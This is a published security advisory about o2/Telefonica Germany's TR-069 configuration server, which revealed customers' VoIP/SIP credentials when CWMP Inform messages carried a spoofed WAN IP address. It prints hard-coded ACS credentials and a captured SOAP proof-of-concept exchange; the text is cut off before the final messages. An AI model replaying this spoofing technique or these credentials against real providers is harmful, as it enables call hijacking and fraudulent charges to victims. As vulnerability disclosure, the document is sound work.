Advisory: o2/Telefonica Germany: ACS Discloses VoIP/SIP Credentials
The o2 Auto Configuration Server (ACS) discloses VoIP/SIP credentials of
arbitrary customers when receiving manipulated CWMP packets. These
credentials can then be used by an attacker to register any VoIP number
of the victim. This enables the attacker to place and receive calls on
behalf of the attacked user.
Details
=======
Product: o2 DSL Auto Configuration Server
Vulnerability Type: Information Disclosure
Security Risk: high
Vendor URL: https://o2online.de/
Vendor Status: fixed
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2015-005
Advisory Status: published
CVE: GENERIC-MAP-NOMATCH
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH
Introduction
============
TR-069 (Technical Report 069) is a Broadband Forum technical
specification entitled "CPE WAN Management Protocol" (CWMP). It defines
an application layer protocol for remote management of end-user devices.
(from Wikipedia)
A more technical introduction to TR-069 can be found in a deck of slides
which the Interoperability Laboratory at the University of New Hampshire
has published on that topic [0].
More Details
============
The German Internet Service Provider o2 uses the TR-069 protocol for the
provisioning of Customer Premises Equipment (CPE). Among other settings,
VoIP/SIP credentials are transferred and VoIP telephony is set up.
In our setup, an AVM FRITZ!Box 7490 was monitored during the initial
autoconfiguration process. During that process, several CWMP messages
are exchanged. These CWMP messages are transferred via HTTPS as SOAP
requests and replies. The HTTPS connection is always established by the
CPE which connects to the Auto Configuration Server (ACS). According to
the CWMP, the CPE may do so on the occasion of several events,
including, but not limited to:
* BOOTSTRAP - first contact between CPE and ACS
* BOOT - when CPE has rebooted
* PERIODIC - after a period of time, defined by the ACS
* CONNECTION REQUEST - ACS signals a connection request to the CPE via a
second HTTP channel
The "CONNECTION REQUEST" is the only event that can be triggered by the
ACS. To do so, the ACS establishes an unencrypted HTTP connection to the
CPE and authenticates via HTTP basic access authentication with a
"ConnectionRequestUsername" and a "ConnectionRequestPassword". No
further data is exchanged on that channel. Once the CPE has verified the
credentials, it then initiates the real CWMP conversation by sending a
CWMP-Inform message to the pre-defined ACS. The connection initiated by
the CPE is TLS-secured and the CPE provides a username
(ManagementServer.Username) and a password (ManagementServer.Password)
to authenticate itself towards the ACS.
A typical CWMP conversation (including the "CONNECTION REQUEST" event)
is depicted below:
.----------------Connection Request---------------. ]
| | ]
v | ]
----------. .-------- ]---> HTTP
|Port| | | ]
|8089| | | ]
`----' | | ACS ]
| | |
| | |----. ]
`----> | ---Inform------------------------> | | ]
| <---InformResponse---------------- | | ]
| | | ]
| ---[empty]-----------------------> | | ]
| <---SetParameterValues------------ | | ]
| | | ]
| ---SetParameterValuesResponse----> |Port| ]---> CWMP
| <---SetParameterValues------------ | 443| ] (HTTPS)
| | | ]
CPE | [...] | | ]
| | | ]
| ---SetParameterValuesResponse----> | | ]
| <---[empty]----------------------- | | ]
| | | ]
During our research, it was observed that the ACS URL as well as
credentials for the initial connection to the ACS are hard-coded. On a
stock AVM FRITZ!Box, running the firmware version 6.20, these can be
found in the file ./providers/otwored/tr069.cfg which is part of the
archive /etc/default.Fritz_Box_HW185/avm/providers-049.tar. For
o2/Telefonica these credentials are:
tr069cfg {
enabled = yes;
igd {
DeviceInfo {
ProvisioningCode = "";
}
managementserver {
url = "https://acs.o2online.de/nbbs/tr69";
username = "00040E-000000000000";
password = "o2acs";
URLAlreadyContacted = no;
PeriodicInformEnable = yes;
PeriodicInformInterval = 3600;
}
}
FirmwareDownload {
enabled = yes;
enabled_converted = yes;
}
ACS_SSL {
verify_server = yes;
trusted_ca_file = "/etc/default/avm/root_ca.pem";
}
Download_SSL {
verify_server = yes;
trusted_ca_file = "/etc/default/avm/root_ca.pem";
}
}
To ease the interaction with the ACS, a minimal TR-069 client was
implemented. With this rogue client it was possible to simulate the
behaviour of an AVM FRITZ!Box 7490 during the initial autoconfiguration
process. Thus, in the following description, the word "CPE" may be
replaced equally with "rogue client".
After the CPE connects to the ACS (see [msg00] in section Proof of
Concept), it gets configured to accept new credentials for incoming
connection requests:
* InternetGatewayDevice.ManagementServer.ConnectionRequestUsername
* InternetGatewayDevice.ManagementServer.ConnectionRequestPassword
(see [msg03])
The CPE is now capable of receiving connection requests from the ACS.
After several seconds, the ACS initiates a connection request and the
CPE starts a CWMP conversation (see [msg06]). During that conversation,
the ACS (ACS A) provides a new ACS URL (ACS B) together with a new set
of login credentials for ACS B:
* InternetGatewayDevice.ManagementServer.URL
* InternetGatewayDevice.ManagementServer.Username
* InternetGatewayDevice.ManagementServer.Password
* InternetGatewayDevice.ManagementServer.ConnectionRequestUsername
* InternetGatewayDevice.ManagementServer.ConnectionRequestPassword
(see [msg09])
Finally, the CPE is rebooted. From that point in time, all CWMP
conversation is directed to ACS B. On the occasion of the "BOOT" event,
the CPE connects to ACS B (see [msg12]) and receives the following
settings:
* InternetGatewayDevice.ManagementServer.PeriodicInformEnable
* InternetGatewayDevice.ManagementServer.PeriodicInformInterval
* InternetGatewayDevice.ManagementServer.PeriodicInformTime
(see [msg15])
After several seconds, again, the CPE receives a connection request. It
connects to ACS B again (see [msg18]) and receives the VoIP credentials
for all telephone numbers, that are assigned to the customer:
* InternetGatewayDevice.Services.VoiceService.1.
VoiceProfile.1.Line.1.DirectoryNumber
* InternetGatewayDevice.Services.VoiceService.1.
VoiceProfile.1.Line.1.SIP.AuthUserName
* InternetGatewayDevice.Services.VoiceService.1.
VoiceProfile.1.Line.1.SIP.AuthPassword
* InternetGatewayDevice.Services.VoiceService.1.
VoiceProfile.1.Line.1.SIP.RegistrarServer
* InternetGatewayDevice.Services.VoiceService.1.
VoiceProfile.1.Line.1.SIP.OutboundProxy
(see [msg23])
The first digits of the AuthPassword are taken from the phone number.
In summary, the CPE has received VoIP credentials while it only supplied
hard-coded login credentials for ACS A. As a result, the ACS must have
identified the CPE by the WAN IP address. It was further determined that
the ACS relies on the WAN/IPv4 address, which is specified as the
parameter
* InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.
WANIPConnection.1.ExternalIPAddress
in the CWMP-Inform messages (see [msg00,06,12,18]).
These CWMP-Inform messages can be manipulated by an attacker and
therefore may contain arbitrary WAN IP addresses. If an attacker sends
such spoofed CWMP-Inform messages during the whole two-step
auto-provisioning process, the ACS returns VoIP credentials which are
assigned to the IP address specified by the attacker.
Additionally, any VoIP number issued by o2 may be registered from any o2
DSL account. Even if the number is already registered by the legit
customer's CPE, an attacker may register the number a second time.
Incoming calls will be directed to both clients and may be answered by
either of them. Furthermore, it allows an attacker to place and receive
phone calls on behalf of any other customer. In consequence, the victim
will be charged with any costs resulting from the abuse.
Proof of Concept
================
As a proof of concept, the CWMP conversation that was captured during
the autoprovisioning of an AVM FRITZ!Box 7490 (Firmware 6.20) is given
below. Each message is the body of an HTTPS POST request (to the ACS) or
an HTTPS POST reply (from the ACS). Some messages have been wrapped to
obtain better readability.
Communication with ACS A:
------------------------------------------------------------------------
[msg00] CPE -> ACS A:
---------------------
<?xml version="1.0"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:soap-enc="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:cwmp="urn:dslforum-org:cwmp-1-0">
<soap:Header>
<cwmp:ID soap:mustUnderstand="1">100</cwmp:ID>
</soap:Header>
<soap:Body>
<cwmp:Inform>
<DeviceId>
<Manufacturer>AVM</Manufacturer>
<OUI>00040E</OUI>
<ProductClass>FRITZ!Box</ProductClass>
<SerialNumber>0896D776FAA2</SerialNumber>
</DeviceId>
<Event soap-enc:arrayType="cwmp:EventStruct[2]">
<EventStruct>
<EventCode>1 BOOT</EventCode>
<CommandKey/>
</EventStruct>
<EventStruct>
<EventCode>0 BOOTSTRAP</EventCode>
<CommandKey/>
</EventStruct>
</Event>
<MaxEnvelopes>1</MaxEnvelopes>
<CurrentTime>2014-09-08T18:27:32+02:00</CurrentTime>
<RetryCount>0</RetryCount>
<ParameterList soap-enc:arrayType="cwmp:ParameterValueStruct[8]">
<ParameterValueStruct>
<Name>InternetGatewayDevice.DeviceSummary</Name>
<Value xsi:type="xsd:string">
InternetGatewayDevice:1.4[](Baseline:2, EthernetLAN:1,
ADSLWAN:1,ADSL2WAN:1, Time:2, IPPing:1, WiFiLAN:2,
DeviceAssociation:1), VoiceService:1.0[2](SIPEndpoint:1,
Endpoint:1, TAEndpoint:1), StorageService:1.0[1](Baseline:1,
FTPServer:1, NetServer:1, HTTPServer:1, UserAccess:1,
VolumeConfig:1)
</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>InternetGatewayDevice.DeviceInfo.HardwareVersion</Name>
<Value xsi:type="xsd:string">FRITZ!Box 7490</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>InternetGatewayDevice.DeviceInfo.SoftwareVersion</Name>
<Value xsi:type="xsd:string">113.06.20</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>InternetGatewayDevice.DeviceInfo.SpecVersion</Name>
<Value xsi:type="xsd:string">1.0</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>InternetGatewayDevice.DeviceInfo.ProvisioningCode</Name>
<Value xsi:type="xsd:string"/>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>
InternetGatewayDevice.ManagementServer.ParameterKey
</Name>
<Value xsi:type="xsd:string"/>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>
InternetGatewayDevice.ManagementServer.ConnectionRequestURL
</Name>
<Value xsi:type="xsd:string">
http://78.48.x.x:8089/869f7018
</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>
InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.
WANIPConnection.1.ExternalIPAddress
</Name>
<Value xsi:type="xsd:string">78.48.x.x</Value>
</ParameterValueStruct>
</ParameterList>
</cwmp:Inform>
</soap:Body>
</soap:Envelope>
[msg01] CPE <- ACS A:
---------------------
<?xml version="1.0"?>
<soapenv:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:cwmp="urn:dslforum-org:cwmp-1-0"
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<soapenv:Header>
<cwmp:ID soapenv:mustUnderstand="1">100</cwmp:ID>
</soapenv:Header>
<soapenv:Body>
<cwmp:InformResponse>
<MaxEnvelopes>1</MaxEnvelopes>
</cwmp:InformResponse>
</soapenv:Body>
</soapenv:Envelope>
[msg02] CPE -> ACS A:
---------------------
[empty]
[msg03] CPE <- ACS A:
---------------------
<?xml version="1.0"?>
<soapenv:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:cwmp="urn:dslforum-org:cwmp-1-0"
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<soapenv:Header>
<cwmp:ID soapenv:mustUnderstand="1">null0</cwmp:ID>
</soapenv:Header>
<soapenv:Body>
<cwmp:SetParameterValues>
<ParameterList soap:arrayType="cwmp:ParameterValueStruct[4]">
<ParameterValueStruct>
<Name>
InternetGatewayDevice.ManagementServer.PeriodicInformEnable
</Name>
<Value xsi:type="xsd:boolean">1</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>
InternetGatewayDevice.ManagementServer.
ConnectionRequestUsername
</Name>
<Value xsi:type="xsd:string">0896D776FAA2</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>
InternetGatewayDevice.ManagementServer.
ConnectionRequestPassword</Name>
<Value xsi:type="xsd:string">
57d29f69eca7b5ca484e4644bf9720
</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>
InternetGatewayDevice.ManagementServer.
PeriodicInformInterval
</Name>
<Value xsi:type="xsd:unsignedInt">200</Value>
</ParameterValueStruct>
</ParameterList>
<ParameterKey>null</ParameterKey>
</cwmp:SetParameterValues>
</soapenv:Body>
</soapenv:Envelope>
[msg04] CPE -> ACS A:
---------------------
<?xml version="1.0"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:soap-enc="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:cwmp="urn:dslforum-org:cwmp-1-0">
<soap:Header>
<cwmp:ID soap:mustUnderstand="1">null0</cwmp:ID>
</soap:Header>
<soap:Body>
<cwmp:SetParameterValuesResponse>
<Status>0</Status>
</cwmp:SetParameterValuesResponse>
</soap:Body>
</soap:Envelope>
[msg05] CPE <- ACS A:
---------------------
[empty]
[msg06] CPE -> ACS A:
---------------------
<?xml version="1.0"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:soap-enc="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:cwmp="urn:dslforum-org:cwmp-1-0">
<soap:Header>
<cwmp:ID soap:mustUnderstand="1">null0</cwmp:ID>
</soap:Header>
<soap:Body>
<cwmp:Inform>
<DeviceId>
<Manufacturer>AVM</Manufacturer>
<OUI>00040E</OUI>
<ProductClass>FRITZ!Box</ProductClass>
<SerialNumber>0896D776FAA2</SerialNumber>
</DeviceId>
<Event soap-enc:arrayType="cwmp:EventStruct[1]">
<EventStruct>
<EventCode>6 CONNECTION REQUEST</EventCode>
<CommandKey/>
</EventStruct>
</Event>
<MaxEnvelopes>1</MaxEnvelopes>
<CurrentTime>2014-09-08T18:27:34+02:00</CurrentTime>
<RetryCount>0</RetryCount>
<ParameterList soap-enc:arrayType="cwmp:ParameterValueStruct[8]">
<ParameterValueStruct>
<Name>InternetGatewayDevice.DeviceSummary</Name>
<Value xsi:type="xsd:string">
InternetGatewayDevice:1.4[](Baseline:2, EthernetLAN:1,
ADSLWAN:1,ADSL2WAN:1, Time:2, IPPing:1, WiFiLAN:2,
DeviceAssociation:1), VoiceService:1.0[2](SIPEndpoint:1,
Endpoint:1, TAEndpoint:1), StorageService:1.0[1](Baseline:1,
FTPServer:1, NetServer:1, HTTPServer:1, UserAccess:1,
VolumeConfig:1)
</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>InternetGatewayDevice.DeviceInfo.HardwareVersion</Name>
<Value xsi:type="xsd:string">FRITZ!Box 7490</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>InternetGatewayDevice.DeviceInfo.SoftwareVersion</Name>
<Value xsi:type="xsd:string">113.06.20</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>InternetGatewayDevice.DeviceInfo.SpecVersion</Name>
<Value xsi:type="xsd:string">1.0</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>InternetGatewayDevice.DeviceInfo.ProvisioningCode</Name>
<Value xsi:type="xsd:string"/>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>
InternetGatewayDevice.ManagementServer.ParameterKey
</Name>
<Value xsi:type="xsd:string">null</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>
InternetGatewayDevice.ManagementServer.ConnectionRequestURL
</Name>
<Value xsi:type="xsd:string">
http://78.48.x.x:8089/869f7018
</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>
InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.
WANIPConnection.1.ExternalIPAddress
</Name>
<Value xsi:type="xsd:string">78.48.x.x</Value>
</ParameterValueStruct>
</ParameterList>
</cwmp:Inform>
</soap:Body>
</soap:Envelope>
[msg07] CPE <- ACS A:
---------------------
<?xml version="1.0"?>
<soapenv:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:cwmp="urn:dslforum-org:cwmp-1-0"
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<soapenv:Header>
<cwmp:ID soapenv:mustUnderstand="1">null0</cwmp:ID>
</soapenv:Header>
<soapenv:Body>
<cwmp:InformResponse>
<MaxEnvelopes>1</MaxEnvelopes>
</cwmp:InformResponse>
</soapenv:Body>
</soapenv:Envelope>
[msg08] CPE -> ACS A:
---------------------
[empty]
[msg09] CPE <- ACS A:
---------------------
<?xml version="1.0"?>
<soapenv:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:cwmp="urn:dslforum-org:cwmp-1-0"
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<soapenv:Header>
<cwmp:ID soapenv:mustUnderstand="1">393158460</cwmp:ID>
</soapenv:Header>
<soapenv:Body>
<cwmp:SetParameterValues>
<ParameterList soap:arrayType="cwmp:ParameterValueStruct[5]">
<ParameterValueStruct>
<Name>InternetGatewayDevice.ManagementServer.URL</Name>
<Value xsi:type="xsd:string">
https://hdm.o2online.de:443/cwmpWeb/CPEMgt
</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>InternetGatewayDevice.ManagementServer.Username</Name>
<Value xsi:type="xsd:string">0896D776FAA2</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>InternetGatewayDevice.ManagementServer.Password</Name>
<Value xsi:type="xsd:string">1410193655111a</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>
InternetGatewayDevice.ManagementServer.
ConnectionRequestUsername
</Name>
<Value xsi:type="xsd:string">0896D776FAA2</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>
InternetGatewayDevice.ManagementServer.
ConnectionRequestPassword
</Name>
<Value xsi:type="xsd:string">1410193655111a</Value>
</ParameterValueStruct>
</ParameterList>
<ParameterKey>39315846</ParameterKey>
</cwmp:SetParameterValues>
</soapenv:Body>
</soapenv:Envelope>
[msg10] CPE -> ACS A:
---------------------
<?xml version="1.0"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:soap-enc="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:cwmp="urn:dslforum-org:cwmp-1-0">
<soap:Header>
<cwmp:ID soap:mustUnderstand="1">393158460</cwmp:ID>
</soap:Header>
<soap:Body>
<cwmp:SetParameterValuesResponse>
<Status>0</Status>
</cwmp:SetParameterValuesResponse>
</soap:Body>
</soap:Envelope>
[msg11] CPE <- ACS A:
---------------------
initializeSession:null
------------------------------------------------------------------------
Communication with ACS B:
------------------------------------------------------------------------
[msg12] CPE -> ACS B:
---------------------
<?xml version="1.0"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:soap-enc="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:cwmp="urn:dslforum-org:cwmp-1-0">
<soap:Header>
<cwmp:ID soap:mustUnderstand="1">393158460</cwmp:ID>
</soap:Header>
<soap:Body>
<cwmp:Inform>
<DeviceId>
<Manufacturer>AVM</Manufacturer>
<OUI>00040E</OUI>
<ProductClass>FRITZ!Box</ProductClass>
<SerialNumber>0896D776FAA2</SerialNumber>
</DeviceId>
<Event soap-enc:arrayType="cwmp:EventStruct[2]">
<EventStruct>
<EventCode>1 BOOT</EventCode>
<CommandKey/>
</EventStruct>
<EventStruct>
<EventCode>0 BOOTSTRAP</EventCode>
<CommandKey/>
</EventStruct>
</Event>
<MaxEnvelopes>1</MaxEnvelopes>
<CurrentTime>2014-09-08T18:27:35+02:00</CurrentTime>
<RetryCount>0</RetryCount>
<ParameterList soap-enc:arrayType="cwmp:ParameterValueStruct[8]">
<ParameterValueStruct>
<Name>InternetGatewayDevice.DeviceSummary</Name>
<Value xsi:type="xsd:string">
InternetGatewayDevice:1.4[](Baseline:2, EthernetLAN:1,
ADSLWAN:1,ADSL2WAN:1, Time:2, IPPing:1, WiFiLAN:2,
DeviceAssociation:1), VoiceService:1.0[2](SIPEndpoint:1,
Endpoint:1, TAEndpoint:1), StorageService:1.0[1](Baseline:1,
FTPServer:1, NetServer:1, HTTPServer:1, UserAccess:1,
VolumeConfig:1)
</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>InternetGatewayDevice.DeviceInfo.HardwareVersion</Name>
<Value xsi:type="xsd:string">FRITZ!Box 7490</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>InternetGatewayDevice.DeviceInfo.SoftwareVersion</Name>
<Value xsi:type="xsd:string">113.06.20</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>InternetGatewayDevice.DeviceInfo.SpecVersion</Name>
<Value xsi:type="xsd:string">1.0</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>InternetGatewayDevice.DeviceInfo.ProvisioningCode</Name>
<Value xsi:type="xsd:string"/>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>
InternetGatewayDevice.ManagementServer.ParameterKey
</Name>
<Value xsi:type="xsd:string">39315846</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>
InternetGatewayDevice.ManagementServer.ConnectionRequestURL
</Name>
<Value xsi:type="xsd:string">
http://78.48.x.x:8089/869f7018
</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>
InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.
WANIPConnection.1.ExternalIPAddress
</Name>
<Value xsi:type="xsd:string">78.48.x.x</Value>
</ParameterValueStruct>
</ParameterList>
</cwmp:Inform>
</soap:Body>
</soap:Envelope>
[msg13] CPE <- ACS B:
---------------------
<?xml version="1.0"?>
<soapenv:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:cwmp="urn:dslforum-org:cwmp-1-0"
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<soapenv:Header>
<cwmp:ID soapenv:mustUnderstand="1">393158460</cwmp:ID>
</soapenv:Header>
<soapenv:Body>
<cwmp:InformResponse>
<MaxEnvelopes>1</MaxEnvelopes>
</cwmp:InformResponse>
</soapenv:Body>
</soapenv:Envelope>
[msg14] CPE -> ACS B:
---------------------
[empty]
[msg15] CPE <- ACS B:
---------------------
<?xml version="1.0"?>
<soapenv:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:cwmp="urn:dslforum-org:cwmp-1-0"
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<soapenv:Header>
<cwmp:ID soapenv:mustUnderstand="1">393158490</cwmp:ID>
</soapenv:Header>
<soapenv:Body>
<cwmp:SetParameterValues>
<ParameterList soap:arrayType="cwmp:ParameterValueStruct[3]">
<ParameterValueStruct>
<Name>
InternetGatewayDevice.ManagementServer.PeriodicInformEnable
</Name>
<Value xsi:type="xsd:boolean">1</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>
InternetGatewayDevice.ManagementServer.
PeriodicInformInterval
</Name>
<Value xsi:type="xsd:unsignedInt">38888</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>
InternetGatewayDevice.ManagementServer.PeriodicInformTime
</Name>
<Value xsi:type="xsd:dateTime">
2014-09-08T10:49:21+1:00
</Value>
</ParameterValueStruct>
</ParameterList>
<ParameterKey>39315849</ParameterKey>
</cwmp:SetParameterValues>
</soapenv:Body>
</soapenv:Envelope>
[msg16] CPE -> ACS B:
---------------------
<?xml version="1.0"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:soap-enc="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:cwmp="urn:dslforum-org:cwmp-1-0">
<soap:Header>
<cwmp:ID soap:mustUnderstand="1">393158490</cwmp:ID>
</soap:Header>
<soap:Body>
<cwmp:SetParameterValuesResponse>
<Status>0</Status>
</cwmp:SetParameterValuesResponse>
</soap:Body>
</soap:Envelope>
[msg17] CPE <- ACS B:
---------------------
[empty]
[msg18] CPE -> ACS B:
---------------------
<?xml version="1.0"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:soap-enc="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:cwmp="urn:dslforum-org:cwmp-1-0">
<soap:Header>
<cwmp:ID soap:mustUnderstand="1">393158490</cwmp:ID>
</soap:Header>
<soap:Body>
<cwmp:Inform>
<DeviceId>
<Manufacturer>AVM</Manufacturer>
<OUI>00040E</OUI>
<ProductClass>FRITZ!Box</ProductClass>
<SerialNumber>0896D776FAA2</SerialNumber>
</DeviceId>
<Event soap-enc:arrayType="cwmp:EventStruct[1]">
<EventStruct>
<EventCode>6 CONNECTION REQUEST</EventCode>
<CommandKey/>
</EventStruct>
</Event>
<MaxEnvelopes>1</MaxEnvelopes>
<CurrentTime>2014-09-08T18:27:36+02:00</CurrentTime>
<RetryCount>0</RetryCount>
<ParameterList soap-enc:arrayType="cwmp:ParameterValueStruct[8]">
<ParameterValueStruct>
<Name>InternetGatewayDevice.DeviceSummary</Name>
<Value xsi:type="xsd:string">
InternetGatewayDevice:1.4[](Baseline:2, EthernetLAN:1,
ADSLWAN:1,ADSL2WAN:1, Time:2, IPPing:1, WiFiLAN:2,
DeviceAssociation:1), VoiceService:1.0[2](SIPEndpoint:1,
Endpoint:1, TAEndpoint:1), StorageService:1.0[1](Baseline:1,
FTPServer:1, NetServer:1, HTTPServer:1, UserAccess:1,
VolumeConfig:1)
</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>InternetGatewayDevice.DeviceInfo.HardwareVersion</Name>
<Value xsi:type="xsd:string">FRITZ!Box 7490</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>InternetGatewayDevice.DeviceInfo.SoftwareVersion</Name>
<Value xsi:type="xsd:string">113.06.20</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>InternetGatewayDevice.DeviceInfo.SpecVersion</Name>
<Value xsi:type="xsd:string">1.0</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>InternetGatewayDevice.DeviceInfo.ProvisioningCode</Name>
<Value xsi:type="xsd:string"/>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>
InternetGatewayDevice.ManagementServer.ParameterKey
</Name>
<Value xsi:type="xsd:string">39315849</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>
InternetGatewayDevice.ManagementServer.ConnectionRequestURL
</Name>
<Value xsi:type="xsd:string">
http://78.48.x.x:8089/869f7018
</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>
InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.
WANIPConnection.1.ExternalIPAddress
</Name>
<Value xsi:type="xsd:string">78.48.x.x</Value>
</ParameterValueStruct>
</ParameterList>
</cwmp:Inform>
</soap:Body>
</soap:Envelope>
[msg19] CPE <- ACS B:
---------------------
<?xml version="1.0"?>
<soapenv:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:cwmp="urn:dslforum-org:cwmp-1-0"
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<soapenv:Header>
<cwmp:ID soapenv:mustUnderstand="1">393158490</cwmp:ID>
</soapenv:Header>
<soapenv:Body>
<cwmp:InformResponse>
<MaxEnvelopes>1</MaxEnvelopes>
</cwmp:InformResponse>
</soapenv:Body>
</soapenv:Envelope>
[msg20] CPE -> ACS B:
---------------------
[empty]
[msg21] CPE <- ACS B:
---------------------
<?xml version="1.0"?>
<soapenv:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:cwmp="urn:dslforum-org:cwmp-1-0"
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<soapenv:Header>
<cwmp:ID soapenv:mustUnderstand="1">393158500</cwmp:ID>
</soapenv:Header>
<soapenv:Body>
<cwmp:SetParameterValues>
<ParameterList soap:arrayType="cwmp:ParameterValueStruct[2]">
<ParameterValueStruct>
<Name>InternetGatewayDevice.DeviceInfo.ProvisioningCode</Name>
<Value xsi:type="xsd:string">
20140908xxxxxx-0896D776FAA2-78.48.x.x
</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>
InternetGatewayDevice.Services.VoiceService.1.Capabilities.
X_AVM-DE_UsePSTN
</Name>
<Value xsi:type="xsd:boolean">0</Value>
</ParameterValueStruct>
</ParameterList>
<ParameterKey>39315850</ParameterKey>
</cwmp:SetParameterValues>
</soapenv:Body>
</soapenv:Envelope>
[msg22] CPE -> ACS B:
---------------------
<?xml version="1.0"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:soap-enc="http://schemas.xmlsoap.org/soap/encoding/"
